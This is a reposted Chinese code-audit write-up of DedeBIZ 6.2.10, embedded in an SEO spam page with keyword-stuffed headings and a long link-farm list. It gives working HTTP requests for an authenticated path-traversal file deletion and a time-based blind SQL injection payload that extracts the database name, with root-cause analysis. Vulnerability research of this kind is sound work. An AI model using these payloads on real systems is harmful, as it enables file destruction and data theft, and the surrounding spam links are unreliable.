当前位置: 首页 > wzjs >正文

建材网站建设 南宁莆田做网站的公司

建材网站建设 南宁,莆田做网站的公司,div使用太多影响网站收录,门户网站英文版建设之前简单审计过DedeBIZ系统,网上还没有对这个系统的漏洞有过详尽的分析,于是重新审计并总结文章,记录下自己审计的过程。 https://github.com/DedeBIZ/DedeV6/archive/refs/tags/6.2.10.zip 📌DedeBIZ 系统并非基于 MVC 框架&…

之前简单审计过DedeBIZ系统,网上还没有对这个系统的漏洞有过详尽的分析,于是重新审计并总结文章,记录下自己审计的过程。

https://github.com/DedeBIZ/DedeV6/archive/refs/tags/6.2.10.zip

image

📌DedeBIZ 系统并非基于 MVC 框架,而是采用 静态化与动态解析结合 的方式进行页面处理。其“路由”主要依赖 静态文件跳转 和 数据库模板解析,因此可以直接访问 PHP 文件来触发相应的动态解析逻辑。

我一般会首先关注对文件的操作,任意文件上传、任意文件删除,任意文件读取、任意文件下载等漏洞都是我第一时间关注的重点,除了黑盒测试时关注功能点外,通过代码审计来看的话速度会更快一点。(这里有一个小技巧,就是直接全局搜索?filename=​,一些 js 文件中可能会包含对文件处理的操作,搜索到后就可以直接进行尝试。)

授权任意文件删除

GET /admin/file_manage_control.php?fmdo=del&filename=../1.txt HTTP/1.1
Host: dedev6.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=51t797sesf49d9oo8je5ugvjfa; dede_csrf_token=dfb0e80d4f74949ef3730a90d3f49c64; dede_csrf_token__ckMd5=554688926d285f96; DedeUserID=1; DedeUserID__ckMd5=6269166a7279678f; DedeLoginTime=1703426661; DedeLoginTime__ckMd5=7c3591094ad5f36b; DedeStUUID=22636dd1d7205; DedeStUUID__ckMd5=bae1ecb193958e0d; ENV_GOBACK_URL=%2Fadmin%2Fmychannel_main.php
Connection: close

image

src\admin\file_manage_control.php

image

src\admin\file_class.php#DeleteFile

image

该漏洞发生在 file_manage_control.php 处理 fmdo=del请求时,由于 DeleteFile方法直接拼接 filename参数生成完整路径并调用 unlink 删除文件,缺乏路径校验,导致攻击者可以构造 ../进行目录遍历,删除任意文件。通过 GET /admin/file_manage_control.php?fmdo=del&filename=../1.txt请求,利用 filename=../1.txt逃出受限目录,删除站点根目录下的 1.txt文件。

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

授权 SQL 注入

首先需要创建表单

image

image

修改添加字段信息

image

image

点击字段发布信息

image

image

构造数据包

image

POST /admin/diy_list.php?action=delete&diyid=1&id[]=1)AND+sleep(5 HTTP/1.1
Host: dedev6.test
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://dedev6.test/admin/index_body.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=51t797sesf49d9oo8je5ugvjfa; dede_csrf_token=dfb0e80d4f74949ef3730a90d3f49c64; dede_csrf_token__ckMd5=554688926d285f96; DedeUserID=1; DedeUserID__ckMd5=6269166a7279678f; DedeLoginTime=1703426661; DedeLoginTime__ckMd5=7c3591094ad5f36b
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image

构造 payload 1)AND+(case(1)when(ascii(substr((select(database()))from(1)for(1)))=100)then(sleep(5))else(1)end

image

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=100)then(sleep(5))else(1)end 为 true 与查询出的数据库名 dedebiz 第一个字母 d 的 ascii 相符合。

为什么我们操作的时候需要那么多的前置条件呢,接下来我会详细说明,首先我们从代码层面查看:

src/admin/diy_list.php

image

对传入的参数 数组 id 通过 , 拼接起来,最后传参到 SQL 语句:

$query = "DELETE FROM `$diy->table` WHERE id IN ($ids)";

参数可以通过 ) 闭合,构成 SQL 注入

我们注意到:

          $query = "DELETE FROM `$diy->table` WHERE id IN ($ids)";if ($dsql->ExecuteNoneQuery($query)) {showmsg('删除成功', "diy_list.php?action=list&diyid={$diy->diyid}");} else {showmsg('删除失败', "diy_list.php?action=list&diyid={$diy->diyid}");}

执行的结果并不会直接返回到界面上,所以这个漏洞时一个盲注漏洞,基于盲注漏洞的特点以及执行数据库时,如果这个表为空,那么便不会执行成功,为了使这个数据库语句执行成功,数据库中必须先保存有数据。

同时这个注入漏洞可以说绝无仅有:

image

对比代码我们发现,就这一部分没有对变量 id 的类型进行检测。


文章转载自:

http://NuIeXskm.yrycb.cn
http://zNJ9NPsd.yrycb.cn
http://holWpAIm.yrycb.cn
http://wSDosb98.yrycb.cn
http://PgrFMuJz.yrycb.cn
http://d53IkeEG.yrycb.cn
http://4EsPnTtB.yrycb.cn
http://8oC4BDuv.yrycb.cn
http://wcMvAbmK.yrycb.cn
http://fBBbk0w1.yrycb.cn
http://fGZsqWSh.yrycb.cn
http://qnDYGQ15.yrycb.cn
http://P80zdMGI.yrycb.cn
http://IOUPGN3P.yrycb.cn
http://lq4FiAFd.yrycb.cn
http://hh4ZPA5C.yrycb.cn
http://k6HbrrWI.yrycb.cn
http://q8yXUeMk.yrycb.cn
http://qJB4CVVz.yrycb.cn
http://OfUM50JG.yrycb.cn
http://h7fZOcCU.yrycb.cn
http://ZLs4vG00.yrycb.cn
http://CM1UNDjv.yrycb.cn
http://OoagqySb.yrycb.cn
http://1bgB68yV.yrycb.cn
http://CNRAGkEO.yrycb.cn
http://UdELE1AP.yrycb.cn
http://cAREPoAR.yrycb.cn
http://efaDyBUL.yrycb.cn
http://f9Fo9Yqq.yrycb.cn
http://www.dtcms.com/wzjs/685515.html

相关文章:

  • 丹阳企业网站建设网站做镜像的有什么用
  • 婚恋网站推广赚钱
  • 自适应导航网站模板山东做公司网站
  • 三合一网站包含什么莆田外贸网站建设有哪些
  • 个人网站备案经验社群营销策略有哪些
  • 网站结构合理网易163企业邮箱注册
  • 学做网站平台游戏推广怎么找玩家
  • 东莞网站设计出名 乐云践新自己做的网站百度收录
  • 怎么开自己的网站推广文案怎么写
  • 怎么部署自己的网站四川省城乡住房建设部网站首页
  • 设计网站公司都选亿企邦做网站工作怀孕
  • 做销售在哪些网站发贴地名公共服务网站建设
  • 手机上上建设网站wordpress简约文艺
  • 给别人做网站的销售叫什么清爽帝国cms
  • 开发类似wordpress外贸网站建设优化
  • 商城网站规划北京市保障性住房建设投资中心官方网站
  • 官方网站welcome怎么注册网站开发运营服务合同
  • 网站模板怎么改wordpress手机编辑器插件下载
  • 邢台网站制作公司网络推广平台收费不便宜
  • 建设银行租房网站网站名称是什么意思
  • 网站推广结束语wordpress 默认模板
  • 网站维护源码网站颜色背景代码
  • 分享几个x站好用的关键词wordpress博客手机发布
  • php网站优化网站开发公司模版
  • 许昌专业做网站公司wordpress微信缩略图
  • wordpress网站慢为什么做游戏网站被封
  • 建站合肥网络公司seowordpress配合七牛云
  • 安徽富通建设有限公司网站苏州网站建设公司
  • 自行建造网站可以做数据图的的网站
  • 学了dw 就可以做网站了吗外贸网站建设可以吗